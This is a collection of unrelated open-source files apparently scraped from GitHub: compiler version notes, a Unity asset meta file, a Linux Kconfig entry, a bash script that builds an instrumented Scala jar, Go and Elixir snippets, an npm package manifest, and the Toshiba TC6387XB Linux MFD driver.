At the moment, the most reliable mixed compilation seems to be using the mingw-provided gfortran/gcc combination from mingw-get. These are the versions used as of June 20, 2014::
>gfortran --version
GNU Fortran (GCC) 4.8.1
Copyright (C) 2013 Free Software Foundation, Inc.
>gcc --version
gcc (GCC) 4.8.1
Copyright (C) 2013 Free Software Foundation, Inc.
| {
"pile_set_name": "Github"
} |
fileFormatVersion: 2
guid: 056578f2a60aa3f47a4459fdb1c7241c
timeCreated: 1433733466
licenseType: Store
NativeFormatImporter:
userData:
assetBundleName:
assetBundleVariant:
| {
"pile_set_name": "Github"
} |
# ORE - Objects Raid Engine (libore.ko)
#
# Note ORE needs to "select ASYNC_XOR". So Not to force multiple selects
# for every ORE user we do it like this. Any user should add itself here
# at the "depends on EXOFS_FS || ..." with an ||. The dependencies are
# selected here, and we default to "ON". So in effect it is like being
# selected by any of the users.
config ORE
tristate
depends on EXOFS_FS || PNFS_OBJLAYOUT
select ASYNC_XOR
select RAID6_PQ
select ASYNC_PQ
default SCSI_OSD_ULD
| {
"pile_set_name": "Github"
} |
#!/bin/bash
#
# Used to compile a jar with instrumented versions of certain classes.
#
# Fix: the original shebang was "#/bin/sh" (missing '!'), and the script
# uses bash-only [[ ]] conditionals, so it must run under bash explicitly.
#
set -e

# Print each command before executing it.
run () {
  echo "% $@"
  "$@"
}

if [ $# -ne 1 ]
then
  echo "Must provide build dir ('target' or 'build')."
  exit 1
fi

scriptDir=$(cd $(dirname $0) && pwd)
TOPDIR="$scriptDir/../.."
RUNTIME="$TOPDIR/src/library/scala/runtime"
SOURCES="$RUNTIME/BoxesRunTime.java $RUNTIME/ScalaRunTime.scala"
SCALAC=$TOPDIR/$1/pack/bin/scalac
SRC_DIR="$scriptDir/library/scala/runtime"
SCALALIB=$TOPDIR/$1/pack/lib/scala-library.jar
CLASSDIR="$scriptDir/classes"
ARTIFACT=instrumented.jar
DESTINATION="$TOPDIR/test/files/speclib"

[[ -x "$SCALAC" ]] || exit 1;

# Compile: copy the pristine runtime sources in, patch them, then build
# with the freshly packed scalac.
run rm -rf $CLASSDIR && mkdir $CLASSDIR
run cp $SOURCES $SRC_DIR

( cd $SRC_DIR && run patch BoxesRunTime.java $scriptDir/boxes.patch && run patch ScalaRunTime.scala $scriptDir/srt.patch )

# Remove .orig backups that patch may have left behind.
ORIG=$(find $SRC_DIR -name '*.orig')
[[ -z "$ORIG" ]] || rm -f $ORIG

JSOURCES=$(find $SRC_DIR -name "*.java" -print)
SOURCES=$(find $SRC_DIR -type f -print)
# echo $SOURCES
run $SCALAC -d $CLASSDIR $SOURCES
run javac -cp $SCALALIB -d $CLASSDIR $JSOURCES

# Jar it up and move the artifact into the test fixture directory.
run cd $CLASSDIR
run jar cf $ARTIFACT .
run mv -f $ARTIFACT "$DESTINATION"
echo "$(cd "$DESTINATION" && pwd)/$ARTIFACT has been created."
"pile_set_name": "Github"
} |
package ons
//Licensed under the Apache License, Version 2.0 (the "License");
//you may not use this file except in compliance with the License.
//You may obtain a copy of the License at
//
//http://www.apache.org/licenses/LICENSE-2.0
//
//Unless required by applicable law or agreed to in writing, software
//distributed under the License is distributed on an "AS IS" BASIS,
//WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
//See the License for the specific language governing permissions and
//limitations under the License.
//
// Code generated by Alibaba Cloud SDK Code Generator.
// Changes may cause incorrect behavior and will be lost if the code is regenerated.
// DataInOnsMqttGroupIdList is a nested struct in ons response
type DataInOnsMqttGroupIdList struct {
	// MqttGroupIdDo holds the MQTT group-id entries returned in the response.
	MqttGroupIdDo []MqttGroupIdDo `json:"MqttGroupIdDo" xml:"MqttGroupIdDo"`
}
| {
"pile_set_name": "Github"
} |
{
"author": {
"name": "Felix Geisendörfer",
"email": "[email protected]",
"url": "http://debuggable.com/"
},
"name": "combined-stream",
"description": "A stream that emits multiple other streams one after another.",
"version": "1.0.5",
"homepage": "https://github.com/felixge/node-combined-stream",
"repository": {
"type": "git",
"url": "git://github.com/felixge/node-combined-stream.git"
},
"main": "./lib/combined_stream",
"scripts": {
"test": "node test/run.js"
},
"engines": {
"node": ">= 0.8"
},
"dependencies": {
"delayed-stream": "~1.0.0"
},
"devDependencies": {
"far": "~0.0.7"
},
"license": "MIT",
"gitHead": "cfc7b815d090a109bcedb5bb0f6713148d55a6b7",
"bugs": {
"url": "https://github.com/felixge/node-combined-stream/issues"
},
"_id": "[email protected]",
"_shasum": "938370a57b4a51dea2c77c15d5c5fdf895164009",
"_from": "combined-stream@>=1.0.5 <1.1.0",
"_npmVersion": "2.10.1",
"_nodeVersion": "0.12.4",
"_npmUser": {
"name": "alexindigo",
"email": "[email protected]"
},
"dist": {
"shasum": "938370a57b4a51dea2c77c15d5c5fdf895164009",
"size": 3675,
"noattachment": false,
"key": "combined-stream/-/combined-stream-1.0.5.tgz",
"tarball": "http://registry.npm.alibaba-inc.com/combined-stream/download/combined-stream-1.0.5.tgz"
},
"maintainers": [
{
"name": "alexindigo",
"email": "[email protected]"
},
{
"name": "apechimp",
"email": "[email protected]"
},
{
"name": "celer",
"email": "[email protected]"
},
{
"name": "felixge",
"email": "[email protected]"
}
],
"directories": {},
"publish_time": 1434338357202,
"_cnpm_publish_time": 1434338357202,
"_resolved": "http://registry.npm.alibaba-inc.com/combined-stream/download/combined-stream-1.0.5.tgz",
"readme": "ERROR: No README data found!"
}
| {
"pile_set_name": "Github"
} |
# credo:disable-for-this-file
defmodule Cog do
  @moduledoc false
  # Minimal Bonny controller: every lifecycle callback simply logs the
  # resource it received.
  use Bonny.Controller
  require Logger

  # Handle "add" events for the watched resource by logging it.
  @impl true
  @spec add(map()) :: :ok | :error
  def add(obj), do: Logger.info("add: #{inspect(obj)}")

  # Handle "modify" events by logging the changed resource.
  @impl true
  @spec modify(map()) :: :ok | :error
  def modify(obj), do: Logger.info("modify: #{inspect(obj)}")

  # Handle "delete" events by logging the removed resource.
  @impl true
  @spec delete(map()) :: :ok | :error
  def delete(obj), do: Logger.info("delete: #{inspect(obj)}")

  # Reconcile callback invoked by Bonny for the watched resource.
  @impl true
  @spec reconcile(map()) :: :ok | :error
  def reconcile(obj), do: Logger.info("reconcile: #{inspect(obj)}")
end
| {
"pile_set_name": "Github"
} |
/*
* Toshiba TC6387XB support
* Copyright (c) 2005 Ian Molton
*
* This program is free software; you can redistribute it and/or modify
* it under the terms of the GNU General Public License version 2 as
* published by the Free Software Foundation.
*
* This file contains TC6387XB base support.
*
*/
#include <linux/module.h>
#include <linux/platform_device.h>
#include <linux/clk.h>
#include <linux/err.h>
#include <linux/mfd/core.h>
#include <linux/mfd/tmio.h>
#include <linux/mfd/tc6387xb.h>
enum {
	TC6387XB_CELL_MMC,	/* index of the MMC subdevice in tc6387xb_cells[] */
};

#ifdef CONFIG_PM
/*
 * Suspend: let the platform save its state first, then gate the external
 * 32kHz clock that was stashed in drvdata by probe.
 */
static int tc6387xb_suspend(struct platform_device *dev, pm_message_t state)
{
	struct clk *clk32k = platform_get_drvdata(dev);
	struct tc6387xb_platform_data *pdata = dev->dev.platform_data;

	if (pdata && pdata->suspend)
		pdata->suspend(dev);
	clk_disable(clk32k);

	return 0;
}

/*
 * Resume: ungate the 32kHz clock before letting the platform restore its
 * state (mirror order of tc6387xb_suspend()).
 */
static int tc6387xb_resume(struct platform_device *dev)
{
	struct clk *clk32k = platform_get_drvdata(dev);
	struct tc6387xb_platform_data *pdata = dev->dev.platform_data;

	clk_enable(clk32k);
	if (pdata && pdata->resume)
		pdata->resume(dev);

	return 0;
}
#else
/* Without CONFIG_PM the driver registers no PM callbacks. */
#define tc6387xb_suspend NULL
#define tc6387xb_resume NULL
#endif
/*--------------------------------------------------------------------------*/
/*
 * Enable hook for the tmio-mmc cell: ungate the 32kHz clock that the
 * parent tc6387xb device stored in its drvdata during probe.
 */
static int tc6387xb_mmc_enable(struct platform_device *mmc)
{
	struct platform_device *parent = to_platform_device(mmc->dev.parent);
	struct clk *osc = platform_get_drvdata(parent);

	clk_enable(osc);

	return 0;
}
/*
 * Disable hook for the tmio-mmc cell: gate the 32kHz clock retrieved from
 * the parent tc6387xb device's drvdata.
 */
static int tc6387xb_mmc_disable(struct platform_device *mmc)
{
	struct platform_device *parent = to_platform_device(mmc->dev.parent);
	struct clk *osc = platform_get_drvdata(parent);

	clk_disable(osc);

	return 0;
}
/*--------------------------------------------------------------------------*/
/* Fixed host clock rate (Hz) advertised to the tmio-mmc subdriver. */
static struct tmio_mmc_data tc6387xb_mmc_data = {
	.hclk = 24000000,
};

/*
 * Resources for the MMC cell: two MMIO windows and one IRQ, interpreted
 * relative to the parent iomem/irq that probe passes to mfd_add_devices().
 */
static struct resource tc6387xb_mmc_resources[] = {
	{
		.start = 0x800,
		.end = 0x9ff,
		.flags = IORESOURCE_MEM,
	},
	{
		.start = 0x200,
		.end = 0x2ff,
		.flags = IORESOURCE_MEM,
	},
	{
		.start = 0,
		.end = 0,
		.flags = IORESOURCE_IRQ,
	},
};

/* Subdevices exposed by this chip: currently only the tmio-mmc host. */
static struct mfd_cell tc6387xb_cells[] = {
	[TC6387XB_CELL_MMC] = {
		.name = "tmio-mmc",
		.enable = tc6387xb_mmc_enable,
		.disable = tc6387xb_mmc_disable,
		.driver_data = &tc6387xb_mmc_data,
		.num_resources = ARRAY_SIZE(tc6387xb_mmc_resources),
		.resources = tc6387xb_mmc_resources,
	},
};
/*
 * Bind the tc6387xb: claim the MMIO window and IRQ, grab the external
 * 32kHz clock, run the board's enable hook, and register the MMC cell.
 */
static int tc6387xb_probe(struct platform_device *dev)
{
	struct tc6387xb_platform_data *pdata = dev->dev.platform_data;
	struct resource *iomem;
	struct clk *clk32k;
	int irq, ret;

	iomem = platform_get_resource(dev, IORESOURCE_MEM, 0);
	if (!iomem) {
		return -EINVAL;
	}

	ret = platform_get_irq(dev, 0);
	if (ret >= 0)
		irq = ret;
	else
		goto err_resource;

	clk32k = clk_get(&dev->dev, "CLK_CK32K");
	if (IS_ERR(clk32k)) {
		ret = PTR_ERR(clk32k);
		goto err_resource;
	}
	/* Stash the clock so remove/suspend/resume and cell hooks can reach it. */
	platform_set_drvdata(dev, clk32k);

	if (pdata && pdata->enable)
		pdata->enable(dev);

	printk(KERN_INFO "Toshiba tc6387xb initialised\n");

	/*
	 * The cell is assigned as its own platform_data (historical mfd-core
	 * pattern; subdrivers presumably recover the mfd_cell — and thus
	 * driver_data — from it).
	 */
	tc6387xb_cells[TC6387XB_CELL_MMC].platform_data =
		&tc6387xb_cells[TC6387XB_CELL_MMC];
	tc6387xb_cells[TC6387XB_CELL_MMC].data_size =
		sizeof(tc6387xb_cells[TC6387XB_CELL_MMC]);

	ret = mfd_add_devices(&dev->dev, dev->id, tc6387xb_cells,
			      ARRAY_SIZE(tc6387xb_cells), iomem, irq);

	if (!ret)
		return 0;

	/*
	 * NOTE(review): on this error path pdata->enable is not undone and
	 * drvdata stays set — confirm whether a disable hook should run here.
	 */
	clk_put(clk32k);
err_resource:
	return ret;
}
/* Unbind: tear down the MFD children, then gate and release the clock. */
static int tc6387xb_remove(struct platform_device *dev)
{
	struct clk *osc = platform_get_drvdata(dev);

	mfd_remove_devices(&dev->dev);

	clk_disable(osc);
	clk_put(osc);

	platform_set_drvdata(dev, NULL);

	return 0;
}
/*
 * Platform driver glue; the PM hooks compile to NULL when CONFIG_PM is
 * not set (see the #else branch above).
 */
static struct platform_driver tc6387xb_platform_driver = {
	.driver = {
		.name = "tc6387xb",
	},
	.probe = tc6387xb_probe,
	.remove = tc6387xb_remove,
	.suspend = tc6387xb_suspend,
	.resume = tc6387xb_resume,
};

/* Module entry point: register the platform driver. */
static int __init tc6387xb_init(void)
{
	return platform_driver_register(&tc6387xb_platform_driver);
}

/* Module exit point: unregister the platform driver. */
static void __exit tc6387xb_exit(void)
{
	platform_driver_unregister(&tc6387xb_platform_driver);
}

module_init(tc6387xb_init);
module_exit(tc6387xb_exit);

MODULE_DESCRIPTION("Toshiba TC6387XB core driver");
MODULE_LICENSE("GPL v2");
MODULE_AUTHOR("Ian Molton");
MODULE_ALIAS("platform:tc6387xb");
| {
"pile_set_name": "Github"
} |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.